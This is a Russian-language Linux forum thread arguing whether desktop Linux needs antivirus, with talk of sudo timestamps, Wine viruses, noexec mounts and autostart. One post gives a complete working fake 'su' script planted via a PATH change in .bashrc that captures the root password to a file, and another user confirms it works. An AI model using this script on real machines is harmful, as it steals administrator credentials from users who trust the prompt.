Нужен ли антивирус на десктопе? (Вслед за фаером и антивирус.)

[Rootlexx]

Нет, не сработает. Времена изменились, вручную из консольки команды запускает уже меньшинство. У большинства программы сами спрашивают пароль для подтверждения перехода в привилегированный режим (aptitude, например, всякие гуёвые конфигурялки в убунте и пр.). Всякие su и sudo запускаются по полному пути в этом случае.

Если у злоумышленника есть доступ к учётной записи пользователя, которому разрешено запускать что sudo, что su — в любом случае система скомпрометирована. Я не спорю, что запоминание пароля — уязвимое место в безопасности (хотя это не Ubuntu так настроена — sudo запоминает пароли по умолчанию). Но далеко не самое главное. Кому хочется большей безопасности, тот устанавливает временной промежуток в нуль и прописывает в /etc/sudoers все возможные команды, которые могут запускаться через sudo, и только они. Но, учитывая необходимость получения доступа к учётной записи, это нельзя назвать открытой дырой. Всё же главная дыра в системе — это её пользователь... Можно просто выдать ему ненастоящее окно запроса пароля, можно даже следить за его действиями, и выдать это окно в нужный момент, и пользователь введёт пароль.
Да и вы переоцениваете количество пользователей, которые никогда не использовали консоль. Думаю, что подавляющее большинство для чего-то да использовало, далеко не все настройки можно произвести сейчас из графического интерфейса, скажу даже больше — меньшинство.

[sash-kan]

sudo запоминает пароли по умолчанию

sudo не запоминает паролей. всё гораздо проще.
либо:
touch /var/run/sudo/$USER
либо:
touch /var/run/sudo/$USER/$TTY
вариант зависит от наличия флага tty_tickets в /etc/sudoers (или соответсвтующей опции при компиляции).

на основе этого timestamp-а и работает механизм «пора ли спрашивать пароль?». управляется опцией timestamp_timeout в /etc/sudoers.
начинающему неплохо ещё ознакомиться с опциями -k и -v самой программы sudo.

p.s. от злоумышленных alias-ов и подмены $PATH с подстановкой фиктивных бинарников/скриптов весьма помогает указание полного пути. но об этом уже, вроде, писали.

p.p.s. ах, да. от alias-ов может помочь escape. но только от alias-ов. типа:
\sudo или s\udo или su\do или sud\o.

[watashiwa_daredeska]

либо:
touch /var/run/sudo/$USER
либо:
touch /var/run/sudo/$USER/$TTY

Чтобы это сделать, надо уже обладать правами рута.

[sash-kan]

watashiwa_darede...
я пояснял принцип действия sudo.
естественно, простому смертному доступ в /var/run/sudo заказан.

[Davinel]

А возможно ли это, кстати? Не интересовался, но.. каким образом в линуксе можно спятать процесс?
Можно конечно его назвать как нибудь так, чтоб он не вызывал подозрений, но это немного не то..

Рут - может. Информация о процессах берётся из файловой системы /proc, так что достаточно подмонтировать на её место фальшивку.

Ну, рут это не интересно, если у злоумышленника есть рутовые права то game over.

[Bluetooth]

А возможно ли это, кстати? Не интересовался, но.. каким образом в линуксе можно спятать процесс?
Можно конечно его назвать как нибудь так, чтоб он не вызывал подозрений, но это немного не то..

Рут - может. Информация о процессах берётся из файловой системы /proc, так что достаточно подмонтировать на её место фальшивку.

Ну, рут это не интересно, если у злоумышленника есть рутовые права то game over.

не, как раз тогда начинается самый интересный гейм

[ovodigor]

все перечитывать много
но как на счет wine-вирусов
я думаю многие пользуются wine, я например пока не могу обойтись
а вирус из под wine может удалить содержимое локальных дисков без проблем

[MMouXe]

Нужен, к примеру, бесплатный Dr.Web CureIt (нормально работает в wine) для отлова wine-вирей. Или для защиты винды на вирт. машине. А так - нет.

[Davinel]

все перечитывать многоsmile.gif
но как на счет wine-вирусов
я думаю многие пользуются wine, я например пока не могу обойтись
а вирус из под wine может удалить содержимое локальных дисков без проблем

я думаю под вайном вирус не пойдет ))
разве что если его специально для вайна написали..

[ovodigor]

я думаю под вайном вирус не пойдет ))
разве что если его специально для вайна написали..

что имеется в виду: что вирус не запустится или что он не сможет разобраться в структуре каталогов, т.е. что будет иметь только доступ к home.
хотя и то и другое не проблема, у меня той же самый тотал имеет доступ ко всем дисков (т.е. может удалять все на что имеет права). С другой стороны если он заражен то он ето может спокойно делать (удалять)

[ovodigor]

Нужен, к примеру, бесплатный Dr.Web CureIt (нормально работает в wine) для отлова wine-вирей. Или для защиты винды на вирт. машине. А так - нет.

и насколько он эффективен против авторанов (модификации появляются очень часто), которые переносят как правило на флешках, а некоторые версии могут и позаражать файлы на флешке, а затем их достаточно запустить и наслаждаться вирусами в linux

[Bluetooth]

Нужен, к примеру, бесплатный Dr.Web CureIt (нормально работает в wine) для отлова wine-вирей. Или для защиты винды на вирт. машине. А так - нет.

и насколько он эффективен против авторанов (модификации появляются очень часто), которые переносят как правило на флешках, а некоторые версии могут и позаражать файлы на флешке, а затем их достаточно запустить и наслаждаться вирусами в linux

А зачем их запускать? я предпочитаю их удалять

[.Serj.]

watashiwa_darede...
Да, есть такое. Согласен, что это нехорошо, хотя настраивается, разумеется.
Тем не менее, это не отменяет факта, что сначала необходимо получить доступ к выполнению команд. А это уже позволяет скомпрометировать систему безо всяких sudo:

Код: Выделить всё

alexey@desktop:~$ cat > /tmp/.hidden/su
#!/bin/bash

SUCCEED_FILE=/tmp/.succeed;
if [ -f "$SUCCEED_FILE" ]; then
    /bin/su "$@"; else
    printf "Password: ";
    stty -echo;
    read pass;
    stty echo;
    printf "\n";
    sleep 3s;
    printf "su: autentification failure\n";
    printf "root password: \"%s\"\n" "$pass" > /tmp/.root_pass;
    touch "$SUCCEED_FILE";
fi
alexey@desktop:~$ chmod a+x /tmp/.hidden/su
alexey@desktop:~$ printf "export PATH=\"/tmp/.hidden:\$PATH\"\n" >> .bashrc
alexey@desktop:~$

Новая оболочка:

Код: Выделить всё

alexey@desktop:~$ su -c whoami
Password:
su: autentification failure
alexey@desktop:~$ # Ой, кажется, не ту педаль нажал. Ну-ка ещё раз...
alexey@desktop:~$ su -c whoami
Password:
root
alexey@desktop:~$ # Всё отлично.

А ночью :

Код: Выделить всё

alexey@desktop:~$ cat /tmp/.root_pass
root password: "Here is the password"
alexey@desktop:~$

Да, способ банальнейший, но в большинстве случаев сработает. Разумеется, можно придумать и что-нибудь более скрытное.

Проверил. Не пашет.

[ovodigor]

А зачем их запускать? я предпочитаю их удалять

а откуда ты знаешь что ты запустил не вирус или зараженой файл?(т.е. когда ты запускает свои файлы на флешке)

[/dev/random]

а откуда ты знаешь что ты запустил не вирус или зараженой файл?(т.е. когда ты запускает свои файлы на флешке)

Бросайте эту вендузятническую привычку держать на флэшке программы.

[Rootlexx]

.Serj.
Писал на скорую руку. Возможно, что-то не так сделал. Сейчас проверю...

Добавлено (15:14): создал нового пользователя «test-user». Проделал все приведённые действия методом копирования-вставки. Всё прекрасно работает.
Да и с чего не будет? Создаётся скрипт/программа с названием, совпадающим с оным у какой-то администраторской, сохраняется куда-нибудь подальше от любопытных глаз, добавляется каталог в PATH, и при новом запуске оболочки перечитывается ~/.bashrc , назначается новый PATH, отчего вместо /bin/su будет выполнен наш скрипт. Конечно, в самом скрипте было бы неплохо предусмотреть автоматический возврат всего в исходное состояние, чтобы было не так легко обнаружить вмешательство, но и так работает.

[Bluetooth]

А зачем их запускать? я предпочитаю их удалять

а откуда ты знаешь что ты запустил не вирус или зараженой файл?(т.е. когда ты запускает свои файлы на флешке)

Если я буду допускать, что такое возможно на практике, то всегда смогу проверять свои программы на флэшке путем сверки чексумм, или просто шифровать их буду(и то и то вообще не требуют включенного моска). Это если у меня вообще будут программы на флэшке.

[ovodigor]

Если я буду допускать, что такое возможно на практике, то всегда смогу проверять свои программы на флэшке путем сверки чексумм, или просто шифровать их буду(и то и то вообще не требуют включенного моска). Это если у меня вообще будут программы на флэшке.

ну тогда проще держать их архивированными и запароленимы. Но суть в том сколько людей такое будет делать?
Большинство делает так как проще, а это не значит безопаснее.
Вирусы могут взламивать систему не напрямую используя ошибки, а просто использовать психологию обычного пользователя.
Помимо того что в связи с переходом некоторого количества школ на linux, после изучения программирования что большинство будет пробовать писать -правильно вирусы и не только. Некоторые просто интересные программы, далее обмениваться между собой. инсталлировать их конечно не надо (то есть куда скопировал оттуда запустил), и соответственно они не будут защищены от перезаписи (изменения).
В той же самой Mandriva автозапуск идет не от рута (не знаю как в других).
А что можно сделать с правами обычного пользователя? Многое (шрифты, комбинации клавиш, настройки экрана ...)
Конечно профессиональные пользователи, так делать не будут, но суть в том что вирусы будут - это лишь вопрос времени, чтобы выросло количество пользователей linux

[drag0n]

А что мешает в случае массового распространения вирусов (хотя такое вирусом назвать трудно, попадаться будут в основном те, кто не бекапит $HOME, да и то в случае если вирус стремится стереть содержимое жесткого диска, остальное вряд ли) таким образом всем ведущим дистростроителям обеспечить монтирование съемных носителей с noexec? И все, все сосут лапу, тем более причин не монтировать съемные носители с этим флагом нет.

Вирусы могут взламивать систему не напрямую используя ошибки, а просто использовать психологию обычного пользователя.

"Здравствуйте, я таджикский вирус. По причине ужасной бедности моего создателя и низкого уровня развития технологий в нашей стране, я не способен причинить какой-либо вред вашему компьютеру. Поэтому очень прошу: сами сотрите какой-нибудь важный для вас фаил, а потом разошлите меня по почте другим адресатам. ) Заранее благодарю за понимание и сотрудничество."

[ovodigor]

А что мешает в случае массового распространения вирусов (хотя такое вирусом назвать трудно, попадаться будут в основном те, кто не бекапит $HOME, да и то в случае если вирус стремится стереть содержимое жесткого диска, остальное вряд ли) таким образом всем ведущим дистростроителям обеспечить монтирование съемных носителей с noexec? И все, все сосут лапу, тем более причин не монтировать съемные носители с этим флагом нет.

noexec это без права запуска?
И что это даст ? От заражения вирусами исполняемых файлов это не спасет.

"Здравствуйте, я таджикский вирус По причине ужасное бедносты моего создателям и рядом уровня развития технологий в нашей стране, я не способен причине какой-либо вреда вашему компьютера. Поэтому очень прошу: сами сотрите какой-нибудь важный для вас фаил, а потом разошлите меня по почте второй адресатам.) Заранее благодарю за понимание и сотрудничество. "

слышал о таком вирусе

P.S. Предположим что вирус каким образом запустился с правами пользователя, что он может сделать? При этом возникают такие вопросы:
1. сколько пользователей имеют прикручен к руту sudo (с недавних пор перестал это делать)
2. сколько пользователей используют скрипты, которые используют часто для рутовый операций (например, я для монтирования iso-файлов) и где они размещены, и с какими правами (у меня без рута можно поменять их)
3 где находятся, например, rpm-ки или tar-ки, в которых тоже немного можно поменять? (время от времени я скачиваю на официальных сайтах некоторые программы которых нет в дистрибутиве,
а сколько пользователей используют не только скачаных с официальных сайтов программы, или носят на флешках, чтобы например, поставить там где нет интернета, не записывать же 30 метров на dvd-r/rw )
4 как думаете сложно скопировать изображение окна где нужно ввести пароль для подтверждения операции с правами рута, пройтись по окне и найти размещение компонентов на нем, чтобы создать аналогичное поверх настоящего, и считать пароль рута?

[Bluetooth]

Если я буду допускать, что такое возможно на практике, то всегда смогу проверять свои программы на флэшке путем сверки чексумм, или просто шифровать их буду(и то и то вообще не требуют включенного моска). Это если у меня вообще будут программы на флэшке.

ну тогда проще держать их архивированными и запароленимы.

Нет, не проще. Тем более я привык вещи по своему назначению использовать. А использовать винрар(ведь наверняка под арзивированным и запароленным вы имели ввиду хранение в рар? ) для этих целей - попахивает маразмом.

Но суть в том сколько людей такое будет делать?
Большинство делает так как проще, а это не значит безопаснее.
Вирусы могут взламивать систему не напрямую используя ошибки, а просто использовать психологию обычного пользователя.

Конечно же, немногие. Вообще практически никто, ибо вообще мало кто будет совать на флешку какие-то там программы.
Конечно, самый простой способ взломать любую систему - заставить пользователя самостоятельно запустить вредоносную программу. Это всем понятно. Но что вы хотите этим сказать?

Конечно профессиональные пользователи, так делать не будут, но суть в том что вирусы будут - это лишь вопрос времени, чтобы выросло количество пользователей linux

Вас это беспокоит? Меня - нет. Я знаю, как в случае нужды довольно надежно от всего этого защититься. Ибо система позволяет.

[drag0n]

noexec это без права запуска?
И что это даст ? От заражения вирусами исполняемых файлов это не спасет.

Зато вирус с флешки никаким автораном не запустится. Придется его инсталлировать в указанную в README папку. А потом еще и качать сорцы и патчить, чтобы заработало...:-)

[Davinel]

что имеется в виду: что вирус не запустится или что он не сможет разобраться в структуре каталогов, т.е. что будет иметь только доступ к home.
хотя и то и другое не проблема, у меня той же самый тотал имеет доступ ко всем дисков (т.е. может удалять все на что имеет права). С другой стороны если он заражен то он ето может спокойно делать (удалять)

Что значит "запустится"? Вы подразумеваете, что я сам, ручками, возьму и запущу его? Не кажется, что это немного чересчур? )) Если же говорить о нормальных вирусах, которые попадают на компьютер через различные уязвимости в сервисах и запускают сами себя через них же - то увольте, вайн не эмулирует виндовые сервисы, и уж точно не эмулирует виндовые дыры в безопасности. Наверняка в вайне есть свои - но это нужно именно под них и писать вирус. Какой то страшный изврат - вирус персонально для вайна ))

автозапуск идет не от рута

Автозапуск в лине и в винде - разные вещи. В линуксе единственное, что он делает - открывает папку с флэшкой. Никаких секретных запусков программ, никаких скрытных подмен файлов тут просто не предусмотрено. Да, вот такая вот убогая система....


Вообще на данный момент в большинстве дистрибутивов безопасностью не озабочены ни на грош. В какой то мере оно верно - безопасность создает неудобства, а угрозы пока нет. Но это ведь не значит, что ей нельзя будет озаботиться в будущем и тогда от подавляющего большинства проникновений можно будет защититься банальным выставлением прав, запрета на запуск/изменение файлов и т.д.

Добавлено (15:14): создал нового пользователя «test-user». Проделал все приведённые действия методом копирования-вставки. Всё прекрасно работает.
Да и с чего не будет? Создаётся скрипт/программа с названием, совпадающим с оным у какой-то администраторской, сохраняется куда-нибудь подальше от любопытных глаз, добавляется каталог в PATH, и при новом запуске оболочки перечитывается ~/.bashrc , назначается новый PATH, отчего вместо /bin/su будет выполнен наш скрипт. Конечно, в самом скрипте было бы неплохо предусмотреть автоматический возврат всего в исходное состояние, чтобы было не так легко обнаружить вмешательство, но и так работает.

Ну от этого довольно легко можно уйти, просто запретив изменять PATH юзеру. Что, имхо, будет правильно с точки зрения секьюрности (:

[Rootlexx]

Ну от этого довольно легко можно уйти, просто запретив изменять PATH юзеру. Что, имхо, будет правильно с точки зрения секьюрности (:

Вы имеете в виду добавление в /etc/bashrc чего-то типа такого:

Код: Выделить всё

if [ $EUID -ne 0 ]; then
        declare -r PATH;
fi

?
Да, но в каком дистрибутиве так сделано по умолчанию? А если это нужно настраивать, так и sudo можно настроить на нулевой период запоминания авторизации. Мы ведь рассматривали поведение по умолчанию.

[ovodigor]

Зато вирус с флешки никаким автораном не запустится. Придется его инсталлировать в указанную в README папку. А потом еще и качать сорцы и патчить, чтобы заработало...:-)

зато переносится вирус нормально посредством копирование зараженных файлов методом ctrl + c, ctrl + v

[ovodigor]

Нет, не проще. Тем более я привык вещи по своему назначению использовать. А использовать винрар(ведь наверняка под арзивированным и запароленным вы имели ввиду хранение в рар? ) для этих целей - попахивает маразмом.

возможно, но у каждого разные методы

Конечно же, немногие. Вообще практически никто, ибо вообще мало кто будет совать на флешку какие-то там программы.
Конечно, самый простой способ взломать любую систему - заставить пользователя самостоятельно запустить вредоносную программу. Это всем понятно. Но что вы хотите этим сказать?

я держу на флешке программы и что? Суть не в том, что вирусы не попадут на компьютер, суть в том что будет с системой если пользователь его запустит (или зараженный файл) не обязательно через вайн. Т.е. нужен ли антивирус, а не в том, что конкретно вы сможете от них защититься. Теоретически и в винде просто защититься от вирусов

Вас это беспокоит? Меня - нет. Я знаю, как в случае нужды довольно надежно от всего этого защититься. Ибо система позволяет.

еще раз повторю, то что я мог в винде обходиться без антивируса, только иногда бросать на проверку и сразу же удалять антивирус, вовсе не означало что ко мне не приходили раз в неделю переставить винду или посмотреть чего комп глючит

[ovodigor]

Что значит "запустится"? Вы подразумеваете, что я сам, ручками, возьму и запущу его? Не кажется, что это немного чересчур? )) Если же говорить о нормальных вирусах, которые попадают на компьютер через различные уязвимости в сервисах и запускают сами себя через них же - то увольте, вайн не эмулирует виндовые сервисы, и уж точно не эмулирует виндовые дыры в безопасности. Наверняка в вайне есть свои - но это нужно именно под них и писать вирус. Какой то страшный изврат - вирус персонально для вайна ))

например, у меня стоит параллельно винда потому что некоторые не знают что может быть другое. И там порой появляются вирусы так вот программы которые я запускаю под вайна могут быть заражены, то есть запускаю я их сам

А на счет того кудою вирусы быстрее добираются то это следует поспрашивать в общежитиях, то есть путем обмена (а антивирус главное имеет каждый)

Автозапуск в лине и в винде - разные вещи. В линуксе единственное, что он делает - открывает папку с флэшкой. Никаких секретных запусков программ, никаких скрытных подмен файлов тут просто не предусмотрено. Да, вот такая вот убогая система....

я имел в виду автозапуск программ при старте системы

Вообще на данный момент в большинстве дистрибутивов безопасностью не озабочены ни на грош. В какой то мере оно верно - безопасность создает неудобства, а угрозы пока нет. Но это ведь не значит, что ей нельзя будет озаботиться в будущем и тогда от подавляющего большинства проникновений можно будет защититься банальным выставлением прав, запрета на запуск/изменение файлов и т.д.

я отвечу после того как определимся с тем или вирусы действуют полностью самостоятельно используя ошибки системы или иногда по запускаются по вине пользователя?

[Davinel]

например, у меня стоит параллельно винда потому что некоторые не знают что может быть другое . И там порой появляются вирусы так вот программы которые я запускаю под вайна могут быть заражены, то есть запускаю я их сам

Уверен на 99.9% что ничего не будет. Вирусы слишком сложны, расчитаны на то, чтобы скрывать себя, маскироваться под другие процессы и т.д. и используют они для этого виндовые методы. В линухе ОС с памятью совершенно иначе работает.

я имел в виду автозапуск программ при старте системы

Секретных способов автозапуска, типа виндового реестра, тут тоже нету. А хуже всего то, что способов автозапуска тут очень много, но каждый конкретный способ работает только в одном определенном случае. Я вот например использую авесам и автостартую программы через .xsession. Гном - через .config/autostart, кеды - еще через что то там. Если использовать все способы сразу - как то слишком заметно получается.

я отвечу после того как определимся с тем или вирусы действуют полностью самостоятельно используя ошибки системы или иногда по запускаются по вине пользователя?

Для дурака подойдет и выскочившая табличка "выполняется rm -rf / введите пароль рута". Тут никакие антивирусы не помогут.

[Bluetooth]

Вообще на данный момент в большинстве дистрибутивов безопасностью не озабочены ни на грош. В какой то мере оно верно - безопасность создает неудобства, а угрозы пока нет. Но это ведь не значит, что ей нельзя будет озаботиться в будущем и тогда от подавляющего большинства проникновений можно будет защититься банальным выставлением прав, запрета на запуск/изменение файлов и т.д.

А вот и неправда. Еще как озабочены. Только они еще и озабочены удобством пользователя, поэтому Вы ни в одном дистрибутиве не найдете параноидальных настроек безопасности, ибо это просто неудобно большинству.А параноики это все себе сами настроят.

Ну от этого довольно легко можно уйти, просто запретив изменять PATH юзеру. Что, имхо, будет правильно с точки зрения секьюрности (:

...и неудобно с точки зрения юзера)))

зато переносится вирус нормально посредством копирование зараженных файлов методом ctrl + c, ctrl + v

У меня таких хоткеев нет. Вирусы мне не страшны?))))

например, у меня стоит параллельно винда потому что некоторые не знают что может быть другоеsmile.gif. И там порой появляются вирусыsmile.gif так вот программы которые я запускаю под вайна могут быть заражены, то есть запускаю я их самsmile.gif

Как грится, ССЗБ )

Секретных способов автозапуска, типа виндового реестра, тут тоже нету. А хуже всего то, что способов автозапуска тут очень много, но каждый конкретный способ работает только в одном определенном случае. Я вот например использую авесам и автостартую программы через .xsession. Гном - через .config/autostart, кеды - еще через что то там. Если использовать все способы сразу - как то слишком заметно получается.

А какой ламер станет прописывать старт вируса в авторан гнома? Вы видели вирусы под винду, которы бы в стартовом меню в папке автозапуск лежали? )
Нормальные люди внедрят его куда угодно, но уж явно не во всякую хрень из пользовательского окружения.

[ovodigor]

Уверен на 99.9% что ничего не будет. Вирусы слишком сложны, расчитаны на то, чтобы скрывать себя, маскироваться под другие процессы и т.д. и используют они для этого виндовые методы. В линухе ОС с памятью совершенно иначе работает.

не обязательно, может сначала позаражать все exe-файлы скажем 5 мин пока пользователь не заметил (и антивирус), а потом пробовать маскироваться, а это уже может засечь антивирус, который вируса не увидел (такими могут быть рассуждения вируса в винде, и первая часть действий пройдет в linux)

То есть защита линукса держится на том, что вирусы со стороны вайн просто пока что ничего не смогут сделать?

Для дурака подойдет и выскочившая табличка "выполняется rm -rf / введите пароль рута". Тут никакие антивирусы не помогут.

Таким образом пройдет только раз, я же имею в виду те методы вирусов, против которых нужно защищаться как начальному пользователю так и более профессиональному (я не говорю о 2-3% пользователей, которые смогут защитить систему на 99% не очень простыми методами)